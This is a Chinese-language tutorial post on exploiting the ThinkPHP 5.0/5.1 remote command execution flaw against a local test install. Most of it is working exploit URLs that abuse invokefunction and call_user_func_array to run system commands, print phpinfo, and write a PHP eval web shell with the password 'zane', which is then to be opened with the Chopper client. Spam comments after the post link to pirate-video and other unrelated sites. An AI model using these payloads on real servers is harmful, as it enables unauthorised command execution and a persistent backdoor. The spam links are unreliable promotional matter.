下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!
thinkphp_5x_命令执行漏洞
受影响版本包括5.0和5.1版本
docker漏洞环境源码:https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:thinkphp5.0.15+php5.6n+ apache2.0http://www.thinkphp.cn/donate/download/id/1125.html
利用system函数远程命令执行
EXPhttp://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
通过phpinfo函数写出phpinfo()信息
EXP:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
使用菜刀连接`http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane`
以上就是关于ThinkPHP漏洞利用的详细内容,更多请关注无为亦愁其它相关文章!
mvcgsxbbze
《2024-03-30 CBA常规赛第50轮 福建浔兴股份VS上海久事》短片剧高清在线免费观看:https://www.jgz518.com/xingkong/144663.html
mgmjmjkfzn
《特警90 II 之亡命天涯》动作片高清在线免费观看:https://www.jgz518.com/xingkong/121549.html
xiatzypbfz
《特案追缉》国产剧高清在线免费观看:https://www.jgz518.com/xingkong/31120.html
yzhvsezgnp
哈哈哈,写的太好了https://www.cscnn.com/
vphvgonqyo
想想你的文章写的特别好https://www.ea55.com/
sxtvkylzgn
看的我热血沸腾啊https://www.237fa.com/
ieotjyxfae
博主真是太厉害了!!!